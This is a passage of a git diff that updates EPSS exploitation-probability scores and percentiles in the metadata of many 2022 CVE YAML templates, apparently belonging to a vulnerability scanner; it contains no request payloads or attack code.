cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 10149a5dc3..45af33e64e 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-33965 cwe-id: CWE-89 - epss-score: 0.01102 - epss-percentile: 0.82762 + epss-score: 0.01128 + epss-percentile: 0.83069 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index 084292a7b5..2e00bfeddf 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-34045 cwe-id: CWE-798 - epss-score: 0.03001 - epss-percentile: 0.89838 + epss-score: 0.03567 + epss-percentile: 0.90677 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index 5ab0c6836e..9821db8844 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34046 cwe-id: CWE-863 - epss-score: 0.21264 - epss-percentile: 0.95949 + epss-score: 0.18248 + epss-percentile: 0.9572 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 33b1b9a2f5..0b27c083ff 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34047 cwe-id: CWE-668 - epss-score: 0.22865 - epss-percentile: 0.96047 + epss-score: 0.19689 + epss-percentile: 0.9586 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 317ab391c2..626a8bce88 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34048 cwe-id: CWE-79 - epss-score: 0.0009 - epss-percentile: 0.37959 + epss-score: 0.00107 + epss-percentile: 0.43123 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index b58cdad62c..6380e47fac 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-34049 cwe-id: CWE-552 - epss-score: 0.14949 - epss-percentile: 0.95263 + epss-score: 0.17111 + epss-percentile: 0.95601 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml index 66a07439d4..65e48cc428 100644 --- a/http/cves/2022/CVE-2022-34093.yaml +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34093 cwe-id: CWE-79 - epss-score: 0.0023 - epss-percentile: 0.6103 + epss-score: 0.00274 + epss-percentile: 0.64649 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index 07ce9a8517..ffb894ca06 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34094 cwe-id: CWE-79 - epss-score: 0.0023 - epss-percentile: 0.6103 + epss-score: 0.00274 + epss-percentile: 0.64649 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 9159623508..c13aee058e 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34121 cwe-id: CWE-829 - epss-score: 0.71775 - epss-percentile: 0.97756 + epss-score: 0.72485 + epss-percentile: 0.978 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index 68777a372a..591c026fe8 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34328 cwe-id: CWE-79 - epss-score: 0.00117 - epss-percentile: 0.45342 + epss-score: 0.00088 + epss-percentile: 0.36947 cpe: cpe:2.3:a:pmb_project:pmb:7.3.10:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index 7b6b03e099..4fa22e6360 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-34576 - epss-score: 0.02343 - epss-percentile: 0.88593 + epss-score: 0.02934 + epss-percentile: 0.89796 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 1ce556f7ca..388e6aa096 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-34590 cwe-id: CWE-89 - epss-score: 0.00618 - epss-percentile: 0.76404 + epss-score: 0.00666 + epss-percentile: 0.77508 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 9b551db372..72d9b2b80d 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-34753 cwe-id: CWE-78 - epss-score: 0.95615 - epss-percentile: 0.99241 + epss-score: 0.95902 + epss-percentile: 0.99328 cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 9aeb08cbb2..0115acc464 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3484 cwe-id: CWE-79 - epss-score: 0.001 - epss-percentile: 0.40716 + epss-score: 0.00119 + epss-percentile: 0.45893 cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index 7b35992def..dfd85e4b92 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-3506 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48428 + epss-percentile: 0.48543 cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 9285c917e2..a04abc602a 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35151 cwe-id: CWE-79 - epss-score: 0.01051 - epss-percentile: 0.82304 + epss-score: 0.012 + epss-percentile: 0.83658 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 76143b653a..a342298ab3 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-35405 cwe-id: CWE-502 - epss-score: 0.97449 - epss-percentile: 0.99946 + epss-score: 0.97461 + epss-percentile: 0.99955 cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index a7a17a6891..45c133c17c 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-35413 cwe-id: CWE-798 - epss-score: 0.6051 - epss-percentile: 0.9746 + epss-score: 0.62257 + epss-percentile: 0.97544 cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index 047289e1aa..e288beee9c 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35416 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.40501 + epss-score: 0.00117 + epss-percentile: 0.45456 cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index 6fe4969ea3..0ce0b45d14 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-35493 cwe-id: CWE-79 epss-score: 0.00133 - epss-percentile: 0.48211 + epss-percentile: 0.48217 cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35653.yaml b/http/cves/2022/CVE-2022-35653.yaml index ceaf3a98b0..32a6a0f030 100644 --- a/http/cves/2022/CVE-2022-35653.yaml +++ b/http/cves/2022/CVE-2022-35653.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35653 cwe-id: CWE-79 - epss-score: 0.00685 - epss-percentile: 0.77764 + epss-score: 0.00815 + epss-percentile: 0.79909 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index a2d4c2bd88..ae3152a8ef 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3578 cwe-id: CWE-79 - epss-score: 0.001 - epss-percentile: 0.40716 + epss-score: 0.00119 + epss-percentile: 0.45893 cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index 53fe1a7c17..fa4bb3c3a6 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-35914 cwe-id: CWE-74 - epss-score: 0.96938 - epss-percentile: 0.99657 + epss-score: 0.96908 + epss-percentile: 0.99653 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index 0f17a23741..7b824faa30 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-36446 cwe-id: CWE-116 - epss-score: 0.9715 - epss-percentile: 0.99754 + epss-score: 0.97131 + epss-percentile: 0.99752 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index dd57e40d0c..ab16e3629f 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-36537 cwe-id: CWE-200 - epss-score: 0.92862 - epss-percentile: 0.988 + epss-score: 0.89401 + epss-percentile: 0.98505 cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index 8f82a7c843..3cd2a420c4 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-36553 cwe-id: CWE-77 - epss-score: 0.18047 - epss-percentile: 0.95662 + epss-score: 0.19044 + epss-percentile: 0.95794 cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 6895da32f7..69633328fe 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-36642 cwe-id: CWE-862 epss-score: 0.68515 - epss-percentile: 0.97668 + epss-percentile: 0.97692 cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 7ebf539d20..cdfe0adcf8 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-36804 cwe-id: CWE-77 - epss-score: 0.97136 - epss-percentile: 0.99746 + epss-score: 0.97171 + epss-percentile: 0.99769 cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index 8cda7992a9..29e3ca5eb7 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-36883 cwe-id: CWE-862 - epss-score: 0.01028 - epss-percentile: 0.82091 + epss-score: 0.01328 + epss-percentile: 0.84557 cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index 4dd41591c3..1c63800241 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-37042 cwe-id: CWE-22 - epss-score: 0.97454 - epss-percentile: 0.99949 + epss-score: 0.97483 + epss-percentile: 0.99965 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 59bddc73c9..e5535f323a 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-37153 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40501 + epss-percentile: 0.40565 cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index 83aa73fa1b..17b1975595 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-37190 cwe-id: CWE-732 epss-score: 0.02018 - epss-percentile: 0.87635 + epss-percentile: 0.87669 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index 4644203b76..4cd3920620 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-37191 cwe-id: CWE-829 epss-score: 0.46328 - epss-percentile: 0.97091 + epss-percentile: 0.97104 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index ded443fc5e..60130fe20e 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-37299 cwe-id: CWE-22 - epss-score: 0.00508 - epss-percentile: 0.7386 + epss-score: 0.00593 + epss-percentile: 0.75976 cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index b8dab50da9..d35900ee4a 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-3768 cwe-id: CWE-89 epss-score: 0.01715 - epss-percentile: 0.86412 + epss-percentile: 0.86454 cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 3f84cd21c4..8bd948cd53 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-3800 cwe-id: CWE-89,CWE-707 epss-score: 0.05291 - epss-percentile: 0.92251 + epss-percentile: 0.92303 cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index ae4db84d9a..a5045e8cc8 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38295 cwe-id: CWE-79 - epss-score: 0.00304 - epss-percentile: 0.66301 + epss-score: 0.00205 + epss-percentile: 0.58392 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index f520cf89d2..03726a6ce5 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-38296 cwe-id: CWE-434 epss-score: 0.02351 - epss-percentile: 0.88613 + epss-percentile: 0.88674 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 6ecdd69eca..efb9c81ff9 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-38463 cwe-id: CWE-79 epss-score: 0.00141 - epss-percentile: 0.49661 + epss-percentile: 0.49765 cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index f8f9cea046..175e4b62e2 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38467 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29156 + epss-score: 0.00074 + epss-percentile: 0.30453 cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 372770ab9f..2aff6d1e60 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38553 cwe-id: CWE-79 - epss-score: 0.00156 - epss-percentile: 0.51787 + epss-score: 0.00218 + epss-percentile: 0.5972 cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index 6a68b302ce..c140d0c886 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-38637 cwe-id: CWE-89 epss-score: 0.01367 - epss-percentile: 0.84733 + epss-percentile: 0.84822 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index 273b3669f8..7c4ffa304d 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38794 cwe-id: CWE-22 - epss-score: 0.0046 - epss-percentile: 0.72569 + epss-score: 0.00536 + epss-percentile: 0.7469 cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 8da106dc5d..7c53d0c3c1 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38817 cwe-id: CWE-306 - epss-score: 0.00907 - epss-percentile: 0.80915 + epss-score: 0.01019 + epss-percentile: 0.82099 cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 6db0ee7847..80bf26f59b 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-38870 cwe-id: CWE-306 epss-score: 0.00669 - epss-percentile: 0.77453 + epss-percentile: 0.77575 cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index 179b26cb1f..652fb28eba 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-39048 cwe-id: CWE-79 - epss-score: 0.00972 - epss-percentile: 0.81587 + epss-score: 0.01306 + epss-percentile: 0.8443 cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml index 488eea58d0..7503e06ea8 100644 --- a/http/cves/2022/CVE-2022-3908.yaml +++ b/http/cves/2022/CVE-2022-3908.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3908 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32706 + epss-score: 0.00119 + epss-percentile: 0.45893 cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index 213ca45055..4a6699341e 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-39195 cwe-id: CWE-79 - epss-score: 0.00132 - epss-percentile: 0.4802 + epss-score: 0.00143 + epss-percentile: 0.50043 cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 989555ad3f..25d1563cb6 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-3933 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.35643 + epss-score: 0.00092 + epss-percentile: 0.38648 cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index 4bb79ea4bf..9e82460d30 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-3934 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.35643 + epss-score: 0.00092 + epss-percentile: 0.38648 cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 0943853d99..4f16800129 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-3980 cwe-id: CWE-611 - epss-score: 0.64829 - epss-percentile: 0.97572 + epss-score: 0.50314 + epss-percentile: 0.97241 cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 58163ed214..e2f496bd30 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 - epss-score: 0.18164 - epss-percentile: 0.9567 + epss-score: 0.15593 + epss-percentile: 0.9539 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index 12603a4627..18ac86459e 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -18,9 +18,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 - cwe-id: CWE-73,CWE-668 - epss-score: 0.88877 - epss-percentile: 0.98431 + cwe-id: CWE-668,CWE-73 + epss-score: 0.87247 + epss-percentile: 0.98369 cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index bd456bbd7e..cfb195f7fa 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ 